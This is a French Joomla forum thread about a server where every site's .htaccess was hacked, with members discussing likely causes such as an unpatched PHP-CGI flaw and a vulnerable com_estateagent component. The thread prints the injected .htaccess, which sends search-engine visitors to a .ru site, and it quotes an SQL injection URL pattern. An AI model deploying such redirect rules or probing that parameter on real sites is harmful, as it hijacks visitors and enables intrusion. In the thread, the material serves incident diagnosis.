Htaccess piraté sur tous les sites du serveur

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • wworld
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Merci jisse, j'ai mis la main sur les logs.
    La suite sur ce poste: http://forum.joomla.fr/showthread.ph...ss-pirat%C3%A9

    Laisser un commentaire:


  • jisse03
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Envoyé par wworld Voir le message
    Salut jisse, salut zeplin, ça fait plaisir de vous retrouver sur le forum
    Je me permet d'ajouter une rallonge à ce poste, un de mes client viens d'avoir le même coups sous Joomla 1.5 (sans le composant estateagent). Il est vrai que l'hébergeur n'est pas spécialement connu pour sa fiabilité (PHPNET.org), il me demande d'ailleurs de trouver la faille et je n'ai accès à aucun log ...
    Hello,

    Sans aucun log disponible, tu vas devoir te rabattre sur le pendule, le chapelet, les gousses d'ail et pieu, ou encore sur une boule de cristal ou les entrailles d'un poulet

    Plus sérieusement, parvenir à tracer la véritable origine d'un crack de site (une fois éliminées les failles des scripts PHP, extensions vulnérables...) n'est pas de tout repos, et se révèle coûteux en temps (donc en ferrailles sonnantes et trébuchantes pour le client).

    Mais y parvenir sans aucun log, autant demander un acte de propriété concernant la Lune, Mars et Jupiter simultanément.

    Pour te donner un exemple, pour un de mes clients, il a fallu 12 jours d'investigations dans les logs systèmes de 90 jours pour trouver une faille dans le firewall du serveur, qui avait servi de point d'entrée...

    Laisser un commentaire:


  • wworld
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Salut jisse, salut zeplin, ça fait plaisir de vous retrouver sur le forum
    Je me permet d'ajouter une rallonge à ce poste, un de mes client viens d'avoir le même coups sous Joomla 1.5 (sans le composant estateagent). Il est vrai que l'hébergeur n'est pas spécialement connu pour sa fiabilité (PHPNET.org), il me demande d'ailleurs de trouver la faille et je n'ai accès à aucun log ...

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Bonjour,

    Je pense avoir isolé le site qui posait souci, il s'agit d'une version composant immobilier :

    Code:
    http://site.com/index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
    Sur joomla 1.5.

    Merci

    Laisser un commentaire:


  • jisse03
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Je veux bien qu'il y ait des failles sur les CMS, mais est t-il possible de placer un fichier htaccess hors du virtual host ?
    Non, un .htaccess ets lié à un host ou VHost, et uniquement à ce host.

    Un virtual host qui ne servait qu'a du ftp, sans aucun script, avait été contaminé par un htaccess.
    Quelle que soit son utilisation, un VHost reste un VHost, son utilisation ne change rien au paramétrage des VHosts Apache et de son acceptation ou pas de PHP, Perl, etc, ni du mode (mod_php, php-cgi, fcgi, suPHP, etc...)

    Je ne sais toujours pas d'ou vient l'intrusion, mais si comme vous dites un patch CGI de sécurité manquait, comment vérifier ?
    Là, sans pouvoir auditer complètement le serveur, tester les divers cas de failles possibles au niveau Apache, PHP, Perl, la présence ou non de Suhosin, etc, il est impossible de vrérifier et tracer l'origine du problème.

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Envoyé par jisse03 Voir le message
    Tout simplement parce que les attaques se font par une IP, et pas par plage IP.
    Re,
    Je veux bien qu'il y ait des failles sur les CMS, mais est t-il possible de placer un fichier htaccess hors du virtual host ?

    Je souhaiterais que le prestataire assume quelque peu ses responsabilités. Un virtual host qui ne servait qu'a du ftp, sans aucun script, avait été contaminé par un htaccess.

    Je ne sais toujours pas d'ou vient l'intrusion, mais si comme vous dites un patch CGI de sécurité manquait, comment vérifier ?

    Laisser un commentaire:


  • jisse03
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Tout simplement parce que les attaques se font par une IP, et pas par plage IP.

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Envoyé par jisse03 Voir le message
    C'est typique des infections .htaccess, pas uniquement Joomla!, mais de tout système ayant un PHP en mode CGI, sans les patches corrigeant la faille de ce mode de PHP.
    Re,
    Oui mais alors pourquoi tous les serveurs ne sont pas touchés ?

    Laisser un commentaire:


  • jisse03
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    C'est typique des infections .htaccess, pas uniquement Joomla!, mais de tout système ayant un PHP en mode CGI, sans les patches corrigeant la faille de ce mode de PHP.

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Le htaccess :
    Code:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*
    google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
    
    RewriteRule ^(.*)$ site.ru [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
    																														RewriteRule ^(.*)$ site.ru [R=301,L]																														
    																														</IfModule>
    Cas similaire sur wordpress, je n'arrive pas sur joomla à trouver le fichier

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Re,
    Merci pour votre soutient,
    Je suis sur une solution Cloud, je n'ai pas pas accès aux fichiers de conf du serveur, le prestataire est connu et fiable, je l'ai averti des la connaissance du problème.

    Dois je me diriger vers un souci hébergement donc, ou une faille joomla (composant, module, plugin ...).

    Comment trouver le coucou ? ;-)

    Laisser un commentaire:


  • jisse03
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Envoyé par zepelin57 Voir le message
    C'est une solution, parce que si l'infogérance du serveur et donc les mises à jour s'y rapportant ne sont pas faites c'est sur que là c'est du pain béni pour les malveillants.
    Bonjour,

    Quand tous les sites d'un même serveur sont crackés simultanément, CrawlProtect ou autre outil n'y pourra pas grand chose.
    Il est fort probable que sur ce serveur il s'agisse d'une version de PHP n'ayant pas reçu les patches de sécurité pour combler la faille PHP-CGI qui permet à un attaquant, d'obtenir des droits très étendus, et donc de parasiter tous les sites, tout en insérant un oeuf de coucou directement dans les fichiers apache, pour réactiver les modifications .htaccess si on les nettoie.

    Attention, une infogérance avec vraie maintenance sécurité est assez coûteuse.

    Laisser un commentaire:


  • zepelin57
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Sinon, je pense remettre les sites un par un sur un nouveau serveur
    C'est une solution, parce que si l'infogérance du serveur et donc les mises à jour s'y rapportant ne sont pas faites c'est sur que là c'est du pain béni pour les malveillants.

    Laisser un commentaire:


  • kadillak
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Re,

    C'est ce que je recherche, par ou ça passe.

    Effectivement, nous sous traitons cette lourde tache, nous avons déjà changé tous les mots de passe. J'aimerais scanner tout le bckup afin de trouver la faille, mais sur quel mots clés ?

    Sinon, je pense remettre les sites un par un sur un nouveau serveur

    Laisser un commentaire:


  • zepelin57
    a répondu
    Re : Htaccess piraté sur tous les sites du serveur

    Bonjour,

    Il faudrait déjà savoir par ou ils sont passés, analyse les logs du serveur. Ensuite modifier tous les mots de passe, j'ai bien dit tous( serveru, mysql, ftp, clients etc.

    Ensuite et sans être méchant, quand on gère 15 sites on s'oriente vers du Pro et donc tu devrais avoir les acquis pour gérer ces situations ou alors sous-traiter l'infogérance.

    Laisser un commentaire:

Annonce

Réduire
1 sur 2 < >

C'est [Réglé] et on n'en parle plus ?

A quoi ça sert ?
La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
Comment ajouter la mention [Réglé] à votre discussion ?
1 - Aller sur votre discussion et éditer votre premier message :


2 - Cliquer sur la liste déroulante Préfixe.

3 - Choisir le préfixe [Réglé].


4 - Et voilà… votre discussion est désormais identifiée comme réglée.

2 sur 2 < >

Assistance au forum - Outil de publication d'infos de votre site

Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

UTILISER À VOS PROPRES RISQUES :
L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

Problèmes connus :
FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

Installation :

1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

Archive zip : https://github.com/AFUJ/FPA/zipball/master

2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
et remplacer www. votresite .com par votre nom de domaine


Exemples:
Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
Télécharger le script fpa-fr.php dans: /public_html/
Pour executer le script: http://www..com/fpa-fr.php

Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
Télécharger le script fpa-fr.php dans: /public_html/cms/
Pour executer le script: http://www..com/cms/fpa-fr.php

En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
Voir plus
Voir moins

Partenaire de l'association

Réduire

Hébergeur Web PlanetHoster
Travaille ...
X